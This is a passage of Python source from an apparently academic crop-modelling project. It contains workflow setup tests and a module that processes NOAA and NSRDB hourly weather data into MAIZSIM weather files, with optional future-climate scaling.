df = pd.DataFrame(results, columns=columns)
return(query, results, df)
```
#### File: ideotype/tests/test_wflow_setup.py
```python
import os
import pytest
import yaml
from shutil import copyfile
from ideotype.data import DATA_PATH
from ideotype.wflow_setup import (make_dircts,
make_inits, make_cultivars,
make_runs, make_jobs, make_subjobs)
# setup pointer to some default init files
if os.path.expanduser('~/') == '/home/disk/eos8/ach315/':
dirct_default_init = '/home/disk/eos8/ach315/upscale/inits/'
else:
# TODO: think about how to address this
dirct_default_init = os.path.join(DATA_PATH, 'test_data', 'inits')
@pytest.fixture(scope='module')
def make_testyaml(tmp_path_factory):
"""Update init_test.yml file on the fly with tmp_paths."""
# link to init_test.yml
tmp_path = tmp_path_factory.mktemp('ideotype_test')
# create standard directory structure in the temp directory
# the mirrors standard project directory
# create the four main directories under the temp project directory
os.mkdir(os.path.join(tmp_path, 'inits'))
os.mkdir(os.path.join(tmp_path, 'jobs'))
os.mkdir(os.path.join(tmp_path, 'runs'))
os.mkdir(os.path.join(tmp_path, 'sims'))
# create secondary directories that need to exist
os.mkdir(os.path.join(tmp_path, 'inits', 'standards'))
os.mkdir(os.path.join(tmp_path, 'inits', 'soils'))
os.mkdir(os.path.join(tmp_path, 'inits', 'cultivars'))
os.mkdir(os.path.join(tmp_path, 'inits', 'customs'))
# /init_standards
dirct_default_standard = os.path.join(dirct_default_init,
'standards',
'opt')
dirct_temp_standard = os.path.join(tmp_path,
'inits',
'standards')
# list of standard init files to copy
fname_standards = ['biology.txt',
'nitrogen.txt',
'drip.txt',
'water.txt',
'waterbound.txt',
'massbl.txt']
# copy all standard init files to temp directory
for fname in fname_standards:
copyfile(
os.path.join(dirct_default_standard, fname),
os.path.join(dirct_temp_standard, fname))
# /init_soils
dirct_default_soil = os.path.join(dirct_default_init,
'soils',
'soils_1')
dirct_temp_soil = os.path.join(tmp_path,
'inits',
'soils')
# list of soil init files to copy
fname_soils = ['grid.txt',
'nod.txt',
'soil.txt',
'solute.txt']
# copy all standard soil files to temp directory
for fname in fname_soils:
copyfile(
os.path.join(dirct_default_soil, fname),
os.path.join(dirct_temp_soil, fname))
# create test_yaml file on the fly for testing purposes
test_yaml = os.path.join(DATA_PATH, 'inits', 'init_test.yml')
updated_yaml = os.path.join(tmp_path, 'init_test.yml')
# check if init_test.yml exists
if not os.path.exists(test_yaml):
raise ValueError(f'{test_yaml} does not exist!')
# read in init_test.yml
with open(test_yaml, 'r') as pfile:
dict_init = yaml.safe_load(pfile)
# update certain paths with tmp_path
dict_init['setup']['path_project'] = str(tmp_path)
dict_init['setup']['path_init_standards'] = dirct_temp_standard
dict_init['setup']['path_init_soils'] = dirct_temp_soil
# overwrite existing init_test.yml file
with open(updated_yaml, 'w') as outfile:
yaml.dump(dict_init, outfile,
default_flow_style=False, sort_keys=False)
return updated_yaml
def test_make_dircts(make_testyaml):
"""Make test directories under temporary path."""
run_name = 'test'
yamlfile = make_testyaml
make_dircts(run_name,
yamlfile=yamlfile,
cont_years=False,
cont_cvars=False) # make test directories
# code to test directories are correct
def test_make_inits(make_testyaml):
"""Make test init.txt within temp directories."""
run_name = 'test'
yamlfile = make_testyaml
make_inits(run_name,
yamlfile=yamlfile,
cont_cvars=False)
def test_make_cultivars(make_testyaml):
"""Make test cvar.txt within temp directories."""
run_name = 'test'
yamlfile = make_testyaml
make_cultivars(run_name,
yamlfile=yamlfile,
cont_cvars=False)
def test_make_runs(make_testyaml):
"""Make test run.txt within temporary directories."""
run_name = 'test'
yamlfile = make_testyaml
make_runs(run_name,
yamlfile=yamlfile,
cont_cvars=False) # write run.txt files
# code to test that run files are correct
def test_make_jobs(make_testyaml):
"""Make test job.txt within temp directories."""
run_name = 'test'
yamlfile = make_testyaml
make_jobs(run_name,
yamlfile=yamlfile,
cont_years=False,
cont_cvars=False) # write job.txt files
# code to test that job files are correct
def test_make_subjobs(make_testyaml):
"""Make test subjobs.sh within temp directory."""
run_name = 'test'
yamlfile = make_testyaml
make_subjobs(run_name,
yamlfile=yamlfile) # write subjobs.sh
# code to test that subjobs.sh is correct
```
#### File: ideotype/ideotype/weafile_process.py
```python
import os
import glob
import yaml
from datetime import datetime
from dateutil import tz
import numpy as np
import pandas as pd
import xarray as xr
from timezonefinder import TimezoneFinder
from ideotype import DATA_PATH
from ideotype.utils import CC_RH, CC_VPD
from ideotype.data_process import read_data
from ideotype.nass_process import nass_summarize
def read_wea(year_start, year_end, climate_treatment=None):
"""
Read in raw hourly weather data.
- Data source: NOAA Integrated Surface Hourly Database
- Link: https://www.ncdc.noaa.gov/isd
- Weather data: temperature, RH, precipitation
- Raw data stored: ~/data/ISH/
- Output csv files stored: ~/upscale/weadata/process/
* note:
For years 1991-2010, only select data from class 1
(refer to NSRDB manual p.7-8 for more details)
- class 1: have complete period of record of 1991-2010.
- class 2: have complete period of record but with
significant periods of interpolated, filler,
or otherwise low-quality input data for solar models.
- class 3: have have some gaps in the period of record
but have at least 3 years of data.
Parameters
----------
year_start : int
year_end : int
climate_treatment : int
Create weather data for future climate projections.
2050 or 2100.
"""
# setting up np.read_fwf arguments
colnames = ['time',
'temp', 'temp_quality',
'dew_temp', 'dtemp_quality',
'precip', 'precip_time',
'precip_depth', 'precip_quality',
'precip_perhr', 'rh']
colspecs = [(15, 25), # time
(87, 92), # temp
(92, 93), # temp_quality
(93, 98), # dew_temp
(98, 99), # dtemp_quality
(105, 8193)] # precip string
# Read in relevant file paths
fpaths_wea = os.path.join(DATA_PATH, 'files', 'filepaths_wea.yml')
with open(fpaths_wea) as pfile:
dict_fpaths = yaml.safe_load(pfile)
# Read in info on conversion between WBAN & USAF id numbering system
fpath_id_conversion = os.path.join(
DATA_PATH, 'sites', dict_fpaths['id_conversion'])
df_stations = pd.read_csv(fpath_id_conversion, header=None, dtype=str)
df_stations.columns = ['WBAN', 'USAF']
# Read in stations info
fpath_stations_info = os.path.join(
DATA_PATH, 'sites', dict_fpaths['stations_info'])
df_sites = pd.read_csv(fpath_stations_info)
# Set up basepath
if climate_treatment is None:
basepath = dict_fpaths['basepath']
else:
basepath = f'{dict_fpaths["basepath"]}_f{climate_treatment}'
# Set up years
if year_start == year_end:
years = [year_start]
else:
years = np.arange(year_start, year_end+1)
# Set up date parser for pandas
dateparser = lambda dates: [datetime.strptime(d, '%Y%m%d%H') for d in dates] # noqa
# Loop through years to read in data
for year in years:
print(year) # track progress
# Check first if file exists already
if os.path.isfile(os.path.join(basepath, f'temp_{year}.csv')):
raise ValueError(f'temp_{year}.csv exists!')
# Set up default timeline
season_start = '02-01-'
season_end = '11-30-'
times = pd.date_range(f'{season_start + str(year)}',
f'{season_end + str(year)} 23:00:00',
freq='1H')
arr_temp_sites = np.zeros(shape=(len(times),))
arr_rh_sites = np.zeros(shape=(len(times),))
arr_precip_sites = np.zeros(shape=(len(times),))
# initiate empty list to store all site ids (USAF)
siteid_all = []
# For years 1961-1990
if year < 1991:
fnames = glob.glob(
os.path.join(os.path.expanduser('~'),
'data', 'ISH', str(year), '*'))
# For years 1991-2010
else:
# Select class1 weather station sites
sites = df_sites.query(
'CLASS == 1').reset_index().USAF.astype('str')
# Select sites within specified year that are class1
sites_year = glob.glob(
os.path.join(os.path.expanduser('~'),
'data', 'ISH', str(year), '*'))
sites_year = pd.Series([
site.split('/')[-1].split('-')[0] for site in sites_year])
sites_year = sites_year[
sites_year.isin(sites)].reset_index(drop=True)
# Drop duplicates in sites_year
sites_year.drop_duplicates(keep='first', inplace=True)
fnames = []
for site in sites_year:
fname = glob.glob(os.path.join(os.path.expanduser('~'),
'data', 'ISH',
str(year),
f'{site}-*'))
if len(fname) == 1:
fnames.append(fname[0])
else:
print(f'choose from files: {fname}')
fname = glob.glob(os.path.join(os.path.expanduser('~'),
'data', 'ISH',
str(year),
f'{site}-99999-*'))
fnames.append(fname[0])
for name in fnames:
# site_id
siteid_usaf = name.split('/')[-1].split('-')[0]
siteid_wban = name.split('/')[-1].split('-')[1]
if siteid_usaf == '999999':
siteid_usaf = df_stations.query(
f'WBAN == "{siteid_wban}"').USAF.item()
siteid_all.append(siteid_usaf)
# Read in fixed width weather data
df = pd.read_fwf(name,
names=colnames,
colspecs=colspecs,
header=None,
index_col='time',
encoding='latin_1',
dtype={'temp': int, 'precip': str},
parse_dates=['time'],
date_parser=dateparser)
# Remove duplicated hours, keeping only first occurrence
# keep = 'first': marks duplicate as True
# except for first occurrence
# ~: not selecting for True ends up selecting
# for the non-duplicated indexes
# *** note: can't just use df.index.drop_duplicates() since
# * that only returns a list of the non-duplicated index
# * but you can't just use that to select non-duplicated rows
# * since it will also pick up the duplicated rows
df = df[~df.index.duplicated(keep='first')]
# Add in missing time values
# Correct for leap years
# Filter only for growing season
df = df.reindex(times, fill_value=np.nan)
# Find precip data
df.precip_time = df[
df['precip'].str.find('ADDAA1') != -1]['precip'].str.split(
'ADDAA1').str.get(1).str.slice(0, 2).astype(float)
df.precip_depth = df[
df['precip'].str.find('ADDAA1') != -1]['precip'].str.split(
'ADDAA1').str.get(1).str.slice(2, 6).astype(float)
df.precip_quality = df[
df['precip'].str.find('ADDAA1') != -1]['precip'].str.split(
'ADDAA1').str.get(1).str.slice(7, 8)
# Filter out weather data based on quality code (data manual p.26)
# Masking unqualified data with NANs:
# code 3 (Erroneous) &
# code 7 (Erroneous, data originated from an NCEI data source)
# *** temp
quality_temp = (
df.temp_quality == '3') | (df.temp_quality == '7')
rows_temp = df[quality_temp].index
df.loc[rows_temp, 'temp'] = np.nan
# *** dew temp
quality_dtemp = (
df.dtemp_quality == '3') | (df.dtemp_quality == '7')
rows_dtemp = df[quality_dtemp].index
df.loc[rows_dtemp, 'dew_temp'] = np.nan
# *** precip
quality_precip = (
df.precip_quality == '3') | (df.precip_quality == '7')
rows_precip = df[quality_precip].index
df.loc[rows_precip, 'precip'] = np.nan
# Replace missing data with NaN
df.temp = df.temp.replace({9999: np.nan})
df.dew_temp = df.dew_temp.replace({9999: np.nan})
df.precip_time = df.precip_time.replace({99: np.nan})
df.precip_depth = df.precip_depth.replace({9999: np.nan})
# Calculate hourly precip depth
df.precip_perhr = df.precip_depth/df.precip_time
# Account for cases where precip_hr = 0
# which produces infinite precip_perhr
df.precip_perhr = df.precip_perhr.replace({np.inf: np.nan})
# Unit conversion
df.temp = np.round(df.temp/10, 2)
df.dew_temp = np.round(df.dew_temp/10, 2)
df.precip_perhr = np.round(df.precip_perhr/10, 1)
# Apply climate treatment if requested
if climate_treatment is not None:
try:
lat = df_sites.query(
f'USAF == {siteid_usaf}')['ISH_LAT (dd)'].item()
lon = df_sites.query(
f'USAF == {siteid_usaf}')['ISH_LON(dd)'].item()
months = list(df.index.month)
scales_temp = scale_climate(lat, lon, months, 'T')
scales_rh = scale_climate(lat, lon, months, 'RH')
# Calculate temperature anomalies based on scaling pattern
# based on CMIP6 SSP3-7.0 scenario
if climate_treatment == 2050:
temp_anomaly = 1.4
precip_anomaly = 0.85 # 15% reduction
elif climate_treatment == 2100:
temp_anomaly = 3.1
precip_anomaly = 0.7 # 30% reduction
# Fetch temperature anomalies
temp_anomalies = [
scale * temp_anomaly for scale in scales_temp]
# Apply temperature anomalies
temp_presentday = df.temp
temp_future = np.round(temp_presentday + temp_anomalies, 2)
df.temp = temp_future
except(ValueError):
print(year, name.split('/')[-1])
# calculate RH through Clausius Clapeyron
df.rh = CC_RH(df.temp, df.dew_temp)
if df[df.rh > 100].rh.sum() > 100:
print('rh > 100: ', year, name)
# fetch RH anomalies
rh_anomalies = [
scale * temp_anomaly for scale in scales_rh]
# apply RH anomalies
rh_presentday = df.rh
rh_future = np.round(rh_presentday + rh_anomalies, 2)
df.rh = rh_future
# apply precip anomalies
precip_presentday = df.precip_perhr
precip_future = np.round(precip_presentday * precip_anomaly, 2)
df.precip_perhr = precip_future
# stack site data
arr_temp_sites = np.vstack([arr_temp_sites, df.temp])
arr_rh_sites = np.vstack([arr_rh_sites, df.rh])
arr_precip_sites = np.vstack([arr_precip_sites, df.precip_perhr])
# Convert all data for single year into pd.DataFrame
df_temp_sites = pd.DataFrame(arr_temp_sites.transpose(), index=times)
df_temp_sites.drop(df_temp_sites.columns[0], axis=1, inplace=True)
df_temp_sites.columns = siteid_all
df_temp_sites.sort_index(axis=1, inplace=True)
df_rh_sites = pd.DataFrame(arr_rh_sites.transpose(), index=times)
df_rh_sites.drop(df_rh_sites.columns[0], axis=1, inplace=True)
df_rh_sites.columns = siteid_all
df_rh_sites.sort_index(axis=1, inplace=True)
df_precip_sites = pd.DataFrame(
arr_precip_sites.transpose(), index=times)
df_precip_sites.drop(df_precip_sites.columns[0], axis=1, inplace=True)
df_precip_sites.columns = siteid_all
df_precip_sites.sort_index(axis=1, inplace=True)
# Output data for each year
df_temp_sites.to_csv(os.path.join(basepath, f'temp_{year}.csv'))
df_rh_sites.to_csv(os.path.join(basepath, f'rh_{year}.csv'))
df_precip_sites.to_csv(os.path.join(basepath, f'precip_{year}.csv'))
def read_solrad(year_start, year_end):
"""
Read in raw hourly solar radiation data.
- Data source: NSRDB
- Source: https://nsrdb.nrel.gov/about/u-s-data.html
- METSTAT Glo (Wh/m2):
Total amount of direct and diffuse solar radiation (METSTAT-modeled)
received on a horizontal surface during the 60-minute period
ending at the timestamp (refer to NSRDB data manla p.15 Table 3)
- Raw data stored: ~/data/ISH_NSRD/
- Output csv files stored: ~/upscale/weadata/process/
* note:
For years 1991-2010, only select data from class 1
(refer to NSRDB manual p.7-8 for more details)
- class 1: have complete period of record of 1991-2010.
- class 2: have complete period of record but with
significant periods of interpolated, filler,
or otherwise low-quality input data for solar models.
- class 3: have have some gaps in the period of record
but have at least 3 years of data.
Parameters
----------
year_start : int
year_end : int
"""
# Read in relevant file paths
fpaths_wea = os.path.join(DATA_PATH, 'files', 'filepaths_wea.yml')
with open(fpaths_wea) as pfile:
dict_fpaths = yaml.safe_load(pfile)
# Set up basepath
basepath = dict_fpaths['basepath']
# Read in info on conversion between WBAN & USAF id numbering system
fpath_id_conversion = os.path.join(
DATA_PATH, 'sites', dict_fpaths['id_conversion'])
df_stations = pd.read_csv(fpath_id_conversion, header=None, dtype=str)
df_stations.columns = ['WBAN', 'USAF']
stations_usaf = df_stations.USAF
# Set up years
if year_start == year_end:
years = [year_start]
else:
years = np.arange(year_start, year_end+1)
# Dataframe setup for years 1961-1990
colnames = ['year', 'month', 'day', 'hour', 'solrad']
colspecs = [(1, 3), (4, 6), (7, 9), (10, 12), (23, 27)]
# Loop through years to read in data
for year in years:
print(year) # track progress
# Check first if file exists already
if os.path.isfile(os.path.join(basepath, f'solrad_{year}.csv')):
raise ValueError(f'solrad_{year}.csv exists!')
# Set up default timeline
season_start = '02-01-'
season_end = '11-30-'
datetimes_season = pd.date_range(
f'{season_start + str(year)}',
f'{season_end + str(year)} 23:00:00', freq='1H')
# Initiate empty array to store data
arr_solrad_sites = np.zeros(shape=len(datetimes_season),)
# initiate empty list to store all site ids (USAF)
siteid_all = []
# For years 1961-1990
if year < 1991:
# Fetch all file names within year
fnames = glob.glob(
os.path.join(os.path.expanduser('~'),
'data', 'ISH_NSRD', str(year), '*'))
for name in fnames:
siteid_wban = name.split('/')[-1].split('_')[0]
siteid_usaf = df_stations.query(
f'WBAN == "{siteid_wban}"').USAF.item()
siteid_all.append(siteid_usaf)
# Read in fixed-width data
df = pd.read_fwf(name,
skiprows=[0],
header=None,
names=colnames,
colspecs=colspecs)
# Structure date-time info
datetimes = df.apply(lambda row: datetime(
year, row['month'], row['day'], row['hour']-1), axis=1)
# Fetch solrad - Global Horizontal Radiation (Wh/m2)
df_solrad = pd.DataFrame(df.solrad)
df_solrad.index = datetimes
# Remove duplicated hours, keeping only first occurrence
# keep = 'first': marks duplicate as True
# except for first occurrence
# ~: not selecting for True ends up selecting
# for the non-duplicated indexes
df_solrad = df_solrad[
~df_solrad.index.duplicated(keep='first')]
# Add in missing time values
# Correct for leap years
# Filter only for growing season
df_solrad = df_solrad.reindex(datetimes_season,
fill_value=np.nan)
# Replace missing data with NaN
df_solrad.replace({9999: np.nan}, inplace=True)
arr_solrad_sites = np.vstack(
[arr_solrad_sites, df_solrad.solrad])
# Convert all data for single year into pd.DataFrame
df_solrad_sites = pd.DataFrame(
arr_solrad_sites.transpose(), index=datetimes_season)
df_solrad_sites.drop(
df_solrad_sites.columns[0], axis=1, inplace=True)
df_solrad_sites.columns = siteid_all
df_solrad_sites.sort_index(axis=1, inplace=True)
# Output data for each year
df_solrad_sites.to_csv(
os.path.join(basepath, f'solrad_{year}.csv'))
# For years 1991-2010:
else:
for station in stations_usaf:
# Search for specified year-site data
fname = glob.glob(os.path.join(
os.path.expanduser('~'),
'data', 'ISH_NSRD', str(year), f'{station}_*.csv'))
if len(fname) == 1:
# Read in file
df = pd.read_csv(fname[0])
siteid_all.append(station)
else:
print('multiple files!', fname)
# Format date-time info
dates = df['YYYY-MM-DD']
hours = df['HH:MM (LST)']
hours = [int(hour.split(':')[0])-1 for hour in hours]
datetimes = [datetime.strptime(
dates[item] + '-' + str(hours[item]),
'%Y-%m-%d-%H') for item in np.arange(df.shape[0])]
# Fetch solrad - Global Horizontal Radiation (Wh/m2)
df_solrad = pd.DataFrame(df['METSTAT Glo (Wh/m^2)'])
df_solrad.columns = ['solrad']
df_solrad.index = datetimes
# Remove duplicated hours, keeping only first occurrence
# keep = 'first': marks duplicate as True
# except for first occurrence
# ~: not selecting for True ends up selecting
# for the non-duplicated indexes
df_solrad = df_solrad[
~df_solrad.index.duplicated(keep='first')]
# Add in missing time values
# Correct for leap years
# Filter only for growing season
df_solrad = df_solrad.reindex(datetimes_season,
fill_value=np.nan)
# Replace missing data with NaN
df_solrad.replace({9999: np.nan}, inplace=True)
# Stacking all data as arrays to make sure
# all dimensions are correct
arr_solrad_sites = np.vstack(
[arr_solrad_sites, df_solrad.solrad])
# Convert all data for single year into pd.DataFrame
df_solrad_sites = pd.DataFrame(
arr_solrad_sites.transpose(), index=datetimes_season)
df_solrad_sites.drop(
df_solrad_sites.columns[0], axis=1, inplace=True)
df_solrad_sites.columns = siteid_all
df_solrad_sites.sort_index(axis=1, inplace=True)
# Output data for each year
df_solrad_sites.to_csv(
os.path.join(basepath, f'solrad_{year}.csv'))
def wea_combine(basepath):
"""
Combine weather data for all years.
Parameters
----------
basepath : str
path where all weather data csv files are stored.
"""
# Set up loop iterables
csv_files = ['temp_*.csv', 'rh_*.csv', 'precip_*.csv', 'solrad_*.csv']
csv_names = ['temp_all.csv', 'rh_all.csv',
'precip_all.csv', 'solrad_all.csv']
for csvs, csv_name in zip(csv_files, csv_names):
print(csv_name)
# Check if compiled csv file exists already
if os.path.isfile(os.path.join(basepath, csv_name)):
print(f'{csv_name} exists already!')
# Combine data for all years
else:
fnames = glob.glob(os.path.join(basepath, csvs))
# Read in and concat data from all years
df_all = pd.concat(
[pd.read_csv(name, index_col=0) for name in fnames])
# Order df by column so sites are ascending
df_all.sort_index(axis=1, inplace=True)
# Order df by index so time is ordered
# * note: glob.glob doesn't always grab filenames in
# the order you might think so better to order
# in this case, solrad was not ordered by year
df_all.sort_index(axis=0, inplace=True)
# Output concatenated and sorted dataframe
df_all.to_csv(os.path.join(basepath, csv_name))
def wea_preprocess(basepath):
"""
Process weather data.
Parameters
----------
basepath: str
path to access weather data
Returns
-------
df_temp
df_rh
df_precip
df_solrad
"""
# Read in processed weather data
df_temp = pd.read_csv(
os.path.join(basepath, 'temp_all.csv'),
index_col=0, parse_dates=True)
df_rh = pd.read_csv(
os.path.join(basepath, 'rh_all.csv'),
index_col=0, parse_dates=True)
df_precip = pd.read_csv(
os.path.join(basepath, 'precip_all.csv'),
index_col=0, parse_dates=True)
df_solrad = pd.read_csv(
os.path.join(basepath, 'solrad_all.csv'),
index_col=0, parse_dates=True)
# Identify overlapping stations (columns) between
# temp/rh/precip dataset & solrad dataset
cols1 = df_temp.columns
cols2 = df_solrad.columns
sites = list(cols1.intersection(cols2))
# Filter for overlapping sites only
df_temp = df_temp.loc[:, sites]
df_rh = df_rh.loc[:, sites]
df_precip = df_precip.loc[:, sites]
df_solrad = df_solrad.loc[:, sites]
return(df_temp, df_rh, df_precip, df_solrad)
def wea_siteyears(df_temp, df_rh, df_precip, df_solrad,
gseason_start, gseason_end, crthr):
"""
Identify valid site-years that satisfy critical hours for gap-flling.
Parameters
----------
df_temp : pd.DataFrame
df_rh : pd.dataFrame
df_precip : pd.DataFrame
df_solrad : pd.DataFrame
gseason_start : int
Start of growing season (month)
gseason_end : int
End of growing season (month)
crthr : int
critical hours for gap-filling
Returns
-------
siteyears : list
"""
# Identify site-years that satisfy critical hours for gap-filling
dfs = [df_temp, df_rh, df_precip, df_solrad]
final_list = []
years = np.arange(1961, 2011)
sites = list(df_temp.columns)
for df in dfs:
siteyears_all = list()
for year in years:
# Filter out specific year
df_year = df[(df.index.year == year) &
(df.index.month >= gseason_start) &
(df.index.month <= gseason_end)]
siteyears = list()
for site in sites:
# Filter out specific site-year
df_siteyear = pd.DataFrame(df_year.loc[:, site])
# 4000: ~55% of the number of rows
# Used as a threshold to toss out site-years
# that have too many gaps to fill
# even if they satisfy the critical hours.
# This is set since I noticed some sites have data
# recorded every 3 hrs.
# Valide data collection method, but I wanted to avoid
# having to gap-fill throuhout that time period,
# especially for precipitation.
lim = 4000
# Only continue processing if have less than ~55% of NaNs
if int(df_siteyear.isna().sum()) < lim:
# Identify whether data entry is NaN
# df.notnull() returns TRUE or FALSE,
# astype(int) turns TRUE into 1, and FALSE into 0
df_siteyear['present'] = df_siteyear.notnull().astype(int)
# Calculate cumulative sum based on whether data is
# Nan value (1) or not (0)
# If there are consecutive missing data,
# the cumulative sum for those two rows will be the same,
# and can further be used for grouping purposes
# to count the number of consecutive missing rows
# within each streak of missing data.
df_siteyear['csum'] = df_siteyear.present.cumsum()
# Select individual timesteps that have missing data
df_siteyear = df_siteyear[
df_siteyear.loc[:, site].isnull()]
# Count the number of consecutive NaNs
nans_list = df_siteyear.groupby('csum')['csum'].count()
# Only record site-years that have fewer consecutive NaNs
# than the critical value set
if nans_list[nans_list > crthr].shape[0] == 0:
use_siteyear = str(year) + '_' + str(site)
siteyears.append(use_siteyear)
siteyears_all.extend(siteyears)
final_list.append(siteyears_all)
# Assign site-years
siteyears_temp = final_list[0]
siteyears_rh = final_list[1]
siteyears_precip = final_list[2]
siteyears_solrad = final_list[3]
# Identify all overlapping site-years
siteyears = list(
set(siteyears_temp) &
set(siteyears_rh) &
set(siteyears_precip) &
set(siteyears_solrad))
return(siteyears)
def wea_filter(siteyears, area_threshold, irri_threshold, yearspersite):
"""
Filter valid site-years based on location, area & irri.
- Location: limit to continental US (boundaries -123, -72, 19, 53)
- Planting area
- Irrigation area
- Estimated pdate
Parameters
----------
siteyears : list
Output of site-years from wea_preprocess()
area: int
Planting area threshold.
irri: int
Percent land irrigated.
yearspersite : int
Minimum number of years of data for each site.
"""
# Identify total number of unique sites within valid site-years
sites = list(set([siteyear.split('_')[1] for siteyear in siteyears]))
sites.sort()
# Read in relevant file paths
fpaths_wea = os.path.join(DATA_PATH, 'files', 'filepaths_wea.yml')
with open(fpaths_wea) as pfile:
dict_fpaths = yaml.safe_load(pfile)
# Read in stations info
fpath_stations_info = os.path.join(
DATA_PATH, 'sites', dict_fpaths['stations_info'])
df_stations = pd.read_csv(fpath_stations_info, dtype={'USAF': str})
# Summarize nass data to fetch planting area & percent irrigated info
df_nass = nass_summarize(1961, 2005)
# Continental US site boundaries
lat_min = 19
lat_max = 53
lon_min = -123
lon_max = -72
# Initiate empty list
areas = []
perct_irris = []
sites_inbound = []
sites_outbound = []
for site in sites:
# Fetch site lat/lon info
lat = df_stations.query(f'USAF == "{site}"')['ISH_LAT (dd)'].item()
lon = df_stations.query(f'USAF == "{site}"')['ISH_LON(dd)'].item()
# Only include sites within continental US boundaries
if (lat_min <= lat <= lat_max) & (lon_min <= lon <= lon_max):
# Append sites within bound
sites_inbound.append(site)
# Calculate distance between site & all nass sites
dist = list(enumerate(
np.sqrt((lat - df_nass.lat)**2 + (lon - (df_nass.lon))**2)))
df_dist = pd.DataFrame(dist, columns=['rownum', 'distance'])
# select the five nearest locations and average for
# cropping area & irrigation percentage
rows = list(df_dist.nsmallest(5, 'distance').rownum)
area = df_nass.iloc[rows].area.mean()
perct_irri = df_nass.iloc[rows].perct_irri.mean()
areas.append(area)
perct_irris.append(perct_irri)
else:
sites_outbound.append(site)
# add planting area & irrigation info for filtering purposes
df_filter = pd.DataFrame({'site': sites_inbound,
'area': areas,
'perct_irri': perct_irris})
sites_filtered = df_filter.query(
f'(area > {area_threshold}) & (perct_irri < {irri_threshold})').site
# Turn siteyears into dataframe for easier processing
siteyear_years = [siteyear.split('_')[0] for siteyear in siteyears]
siteyear_sites = [siteyear.split('_')[1] for siteyear in siteyears]
df_siteyears = pd.DataFrame({'site': siteyear_sites,
'year': siteyear_years})
# Filter siteyears based on area & percent irrigated
siteyears_filtered = df_siteyears[df_siteyears.site.isin(sites_filtered)]
# Filter out sites that have less than 10 years of data
df_count = pd.DataFrame(siteyears_filtered.groupby('site').count())
sites_discard = list(df_count.query(f'year < {yearspersite}').index)
siteyears_filtered = siteyears_filtered[
~siteyears_filtered.site.isin(sites_discard)]
return(siteyears_filtered)
def make_weafile(siteyears_filtered,
df_temp, df_rh, df_precip, df_solrad,
outpath,
climate_treatment=None):
"""
Make individual maizsim weather files.
* Note on handling time zone issues:
- ISH data (temp, rh, precip): recorded in UTC time
- NSRB data (solrad): recorded in local time
* Process:
1. Select ISH data (temp, rh, precip) based on UTC time
2. Convert UTC datetime info into local datetime
3. Write out local datetime info as the date-time columns in maizsim
4. Select solrad data based on local datetime
Parameters
----------
siteyears_filtered : list
List of valid & filtered siteyears
"""
# Read in station info
fpaths_wea = os.path.join(DATA_PATH, 'files', 'filepaths_wea.yml')
with open(fpaths_wea) as pfile:
dict_fpaths = yaml.safe_load(pfile)
# Read in info on conversion between WBAN & USAF id numbering system
fpath_stations_info = os.path.join(
DATA_PATH, 'sites', dict_fpaths['stations_info'])
df_stations = pd.read_csv(fpath_stations_info, dtype={'USAF': str})
# Package needed to find timezone
tf = TimezoneFinder()
for row in np.arange(siteyears_filtered.shape[0]):
# year & site
year = siteyears_filtered.iloc[row]['year']
site = siteyears_filtered.iloc[row]['site']
# lat & lon
lat = df_stations.query(f'USAF == "{site}"')['ISH_LAT (dd)'].item()
lon = df_stations.query(f'USAF == "{site}"')['ISH_LON(dd)'].item()
# Find and define timezone
zone = tf.timezone_at(lng=lon, lat=lat)
from_zone = tz.gettz('UTC')
to_zone = tz.gettz(zone)
# Construct dataframe that will hold all weather data
col = ['jday', 'date', 'hour',
'solrad', 'temp', 'precip', 'rh', 'co2']
df_wea = pd.DataFrame(columns=col)
# UTC datetimes
season_start = '02-02-'
season_end = '11-30-'
timestamps = pd.date_range(f'{season_start + year}',
f'{season_end + year} 23:00:00',
freq='1H')
# Convert timestamp into datetime object
datetimes = [tstamp.to_pydatetime() for tstamp in timestamps]
# Assign datetime object UTC timezone
datetimes_utc = [
dt.replace(tzinfo=from_zone) for dt in datetimes]
# Convert UTC datetime to local datetime
datetimes_local = [
dt_utc.astimezone(to_zone) for dt_utc in datetimes_utc]
# Put together df_wea:
# 1. Select temp, rh, & precip data based on original timestamps (UTC)
df_wea.temp = list(df_temp.loc[timestamps, site])
df_wea.rh = list(df_rh.loc[timestamps, site])
df_wea.precip = list(df_precip.loc[timestamps, site])
# CO2 levels for future climate
if climate_treatment is not None:
if climate_treatment == 2050:
df_wea.co2 = 550
elif climate_treatment == 2100:
df_wea.co2 = 850
else:
df_wea.co2 = 400
# 2. Use converted local datetime as time info in df_wea
df_wea.jday = [int(datetime.strftime(
dt_local, '%j')) for dt_local in datetimes_local]
df_wea.date = [datetime.strftime(
dt_local, "'%m/%d/%Y'") for dt_local in datetimes_local]
df_wea.hour = [dt_local.hour for dt_local in datetimes_local]
# 3. Select solrad data based on converted local datetime
timestamps_local = [datetime.strftime(
dt_local, '%Y-%m-%d %H:%M:%S') for dt_local in datetimes_local]
df_wea.solrad = list(df_solrad.loc[timestamps_local, site])
# Gap-fill df_wea
df_wea.interpolate(axis=0, inplace=True)
# Round values one last time for uniform weather data
# otherwise interpolated points will end up with long floating nums
df_wea = df_wea.round({'solrad': 1, 'temp': 1, 'precip': 1, 'rh': 2})
# Remove artificial duplicated jday-hour row created
# due to daylight saving (~jday 300)
# * note: this is not a complete duplicate of rows
# * since the data are actually from a different hour
# * however, the jday-time index become duplicated
# * and may cause issues in maizsim
# * and definitely cause problems when inserting
# * weather data into database
jday_time = [
f'{df_wea.jday[row]}_{df_wea.hour[row]}'
for row in np.arange(df_wea.shape[0])]
df_jdaytime = pd.DataFrame(jday_time)
index_to_drop = df_jdaytime[df_jdaytime.duplicated()].index.values
# Drop dupliacted jday_time row only if it exists
if index_to_drop.size > 0:
df_wea.drop(index=index_to_drop, inplace=True)
# Edge case where first row is nan and was not interpolated
if df_wea.isna().sum().sum() > 0:
print(f'Require additional gap fill: {site}_{year}')
# Write out df_wea for each site-year
wea_txt = os.path.join(outpath, f'{site}_{year}.txt')
if os.path.exists(wea_txt):
print(f'{site}_{year}.txt exists!')
else:
df_wea.to_csv(wea_txt, sep='\t', index=False)
def wea_summarize(siteyears_filtered,
df_temp, df_rh, df_precip, df_solrad,
gseason_start, gseason_end):
"""
Summarize growing season weather data.
* note: linear interpolation prior to summarizing
- mean climate conditions
- variability within climate: variance/mean
Parameters
----------
df_temp : pd.DataFrame
df_rh : pd.DataFrame
df_precip : pd.DataFrame
df_solrad : pd.DataFrame
Returns
-------
df_wea_summary : pd.DataFrame
Summary weather data info.
"""
temp_all = [np.nan]*siteyears_filtered.shape[0]
